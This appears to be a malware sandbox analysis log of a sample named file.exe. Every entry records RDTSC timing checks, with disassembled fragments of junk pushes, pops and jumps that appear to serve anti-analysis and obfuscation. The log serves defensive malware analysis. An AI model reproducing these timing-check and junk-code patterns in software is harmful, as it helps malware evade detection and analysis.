Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E44C second address: 96E477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FB7D509B84Ah 0x0000000f je 00007FB7D509B846h 0x00000015 jmp 00007FB7D509B84Ch 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E477 second address: 96E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DC5F second address: 96DC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DC63 second address: 96DCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB7D50A5EDEh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB7D50A5EE6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCA3 second address: 96DCB9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB7D509B84Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB7D509B846h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCB9 second address: 96DCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970965 second address: 9709B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB7D509B857h 0x0000000a jmp 00007FB7D509B84Dh 0x0000000f popad 0x00000010 jmp 00007FB7D509B859h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97063C second address: 970642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970642 second address: 97064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97064C second address: 97065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007FB7D50A5ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97065A second address: 970671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B852h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970671 second address: 970677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970677 second address: 970682 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97521C second address: 975220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974AD2 second address: 974ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007FB7D509B846h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974ADF second address: 974B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE9h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c ja 00007FB7D50A5ED8h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974B0C second address: 974B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974C33 second address: 974C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974C39 second address: 974C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 jg 00007FB7D509B846h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974C50 second address: 974C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979327 second address: 97932F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97932F second address: 979345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jns 00007FB7D50A5ED6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9784D8 second address: 9784F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B857h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9784F4 second address: 97852A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE9h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97852A second address: 97852F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97852F second address: 978535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978535 second address: 978548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB7D509B84Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978548 second address: 97855C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9786A3 second address: 9786BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB7D509B84Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9786BD second address: 9786CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB7D50A5EDAh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978991 second address: 9789A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB7D509B84Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789A5 second address: 9789B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789B8 second address: 9789DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FB7D509B862h 0x0000000e jmp 00007FB7D509B84Eh 0x00000013 push edx 0x00000014 je 00007FB7D509B846h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978E53 second address: 978E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d jnc 00007FB7D50A5EDCh 0x00000013 jo 00007FB7D50A5ED8h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d ja 00007FB7D50A5ED8h 0x00000023 pushad 0x00000024 jg 00007FB7D50A5ED6h 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D739 second address: 97D740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D740 second address: 97D751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB7D50A5ED6h 0x0000000a jng 00007FB7D50A5ED6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D751 second address: 97D75B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D509B852h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D75B second address: 97D761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DA51 second address: 97DA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DE6C second address: 97DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DE71 second address: 97DE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DE76 second address: 97DE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB7D50A5ED6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9218A5 second address: 9218A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9218A9 second address: 921923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FB7D50A5ED8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FB7D50A5ED8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push edx 0x0000002b mov edi, dword ptr [ebp+122D2CCAh] 0x00000031 pop ecx 0x00000032 call 00007FB7D50A5EE5h 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop eax 0x0000003a movzx edi, dx 0x0000003d popad 0x0000003e pop edi 0x0000003f mov ebx, dword ptr [ebp+12485979h] 0x00000045 mov dword ptr [ebp+122D25C2h], ecx 0x0000004b mov edi, dword ptr [ebp+122D3860h] 0x00000051 add eax, ebx 0x00000053 add dword ptr [ebp+122D2FF9h], edi 0x00000059 mov dword ptr [ebp+122D387Eh], edi 0x0000005f push eax 0x00000060 push ebx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 921923 second address: 921964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FB7D509B848h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 cld 0x00000024 push 00000004h 0x00000026 sub dword ptr [ebp+122D3A2Fh], ebx 0x0000002c pushad 0x0000002d xor dword ptr [ebp+122D19DDh], ecx 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jc 00007FB7D509B848h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97E166 second address: 97E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9863FE second address: 986404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986404 second address: 98640A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98640A second address: 986412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986412 second address: 986416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986416 second address: 98641A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9846F8 second address: 9846FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98499E second address: 9849B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB7D509B846h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB7D509B84Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9849B4 second address: 9849BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9849BC second address: 9849C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985275 second address: 98527A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 985571 second address: 9855B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D509B856h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB7D509B859h 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FB7D509B846h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986100 second address: 986104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986104 second address: 986133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB7D509B84Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FB7D509B84Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007FB7D509B84Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DF91C second address: 8DF920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B5CD second address: 98B5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98B5D1 second address: 98B5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EB6F second address: 98EB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB7D509B846h 0x0000000e jmp 00007FB7D509B84Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EB88 second address: 98EBAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB7D50A5EDEh 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 popad 0x00000012 push ecx 0x00000013 jnl 00007FB7D50A5ED8h 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE5D second address: 98EE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE61 second address: 98EE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE6B second address: 98EE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE6F second address: 98EE9C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB7D50A5EDDh 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FB7D50A5EDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EE9C second address: 98EEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB7D509B852h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EEB9 second address: 98EECE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB7D50A5ED6h 0x00000008 jo 00007FB7D50A5ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EECE second address: 98EED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EED7 second address: 98EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EEDB second address: 98EEE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EFF6 second address: 98EFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EFFD second address: 98F01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FB7D509B851h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F01B second address: 98F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB7D50A5EDFh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F035 second address: 98F039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F16D second address: 98F177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F2DE second address: 98F2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB7D509B846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F2E8 second address: 98F2F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98F2F2 second address: 98F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F04 second address: 993F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB7D50A5EE1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F1A second address: 993F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F21 second address: 993F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB7D50A5EE7h 0x0000000f jmp 00007FB7D50A5EE1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F41 second address: 993F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B854h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F59 second address: 993F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 993F5D second address: 993F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99BD23 second address: 99BD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FB7D50A5EDCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99BD38 second address: 99BD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B84Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99BD4B second address: 99BD6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FB7D50A5F06h 0x0000000e jmp 00007FB7D50A5EDDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99BD6A second address: 99BD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 999EF8 second address: 999F25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB7D50A5EDFh 0x00000010 rdtsc
